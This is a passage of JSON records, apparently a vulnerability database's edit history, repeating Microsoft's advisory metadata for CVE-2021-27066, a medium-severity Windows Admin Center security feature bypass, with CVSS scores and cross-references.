"viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-21T10:45:34", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-21T10:45:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}, {"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-25T23:07:21", "differentElements": ["msAffectedSoftware"], "edition": 91}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3c029ffeade3d3a98dc989d14961ebb1", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-26T00:44:38", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-21T10:45:34", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-21T10:45:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-26T00:44:38", "differentElements": ["msAffectedSoftware"], "edition": 92}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3658a9de69169c8131cdc7d2cd2a9cfb", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-26T08:45:07", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-21T10:45:34", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-21T10:45:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}, {"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-26T08:45:07", "differentElements": ["msAffectedSoftware"], "edition": 93}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3c029ffeade3d3a98dc989d14961ebb1", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-26T20:45:16", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-21T10:45:34", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-21T10:45:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-26T20:45:16", "differentElements": ["msAffectedSoftware"], "edition": 94}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3658a9de69169c8131cdc7d2cd2a9cfb", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-28T08:53:42", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-21T10:45:34", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-21T10:45:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}, {"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-28T08:53:42", "differentElements": ["msAffectedSoftware"], "edition": 95}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3c029ffeade3d3a98dc989d14961ebb1", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-28T10:42:12", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-21T10:45:34", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-21T10:45:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-28T10:42:12", "differentElements": ["msAffectedSoftware"], "edition": 96}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3658a9de69169c8131cdc7d2cd2a9cfb", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-29T08:48:46", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-21T10:45:34", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-21T10:45:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}, {"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-29T08:48:46", "differentElements": ["msAffectedSoftware"], "edition": 97}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3c029ffeade3d3a98dc989d14961ebb1", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-29T10:43:39", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-21T10:45:34", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-21T10:45:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-29T10:43:39", "differentElements": ["msAffectedSoftware"], "edition": 98}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3658a9de69169c8131cdc7d2cd2a9cfb", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-30T06:48:13", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-21T10:45:34", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-21T10:45:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}, {"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-30T06:48:13", "differentElements": ["msAffectedSoftware"], "edition": 99}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3c029ffeade3d3a98dc989d14961ebb1", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-09-30T20:45:41", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-21T10:45:34", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-21T10:45:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-30T20:45:41", "differentElements": ["msAffectedSoftware"], "edition": 100}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3658a9de69169c8131cdc7d2cd2a9cfb", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-10-01T06:43:22", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-21T10:45:34", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-21T10:45:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}, {"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-10-01T06:43:22", "differentElements": ["msAffectedSoftware"], "edition": 101}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3c029ffeade3d3a98dc989d14961ebb1", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-10-01T09:06:47", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-09-21T10:45:34", "rev": 2}, "score": {"value": 5.8, "vector": "NONE", "modified": "2021-09-21T10:45:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-10-01T09:06:47", "differentElements": ["msAffectedSoftware"], "edition": 102}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3658a9de69169c8131cdc7d2cd2a9cfb", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", 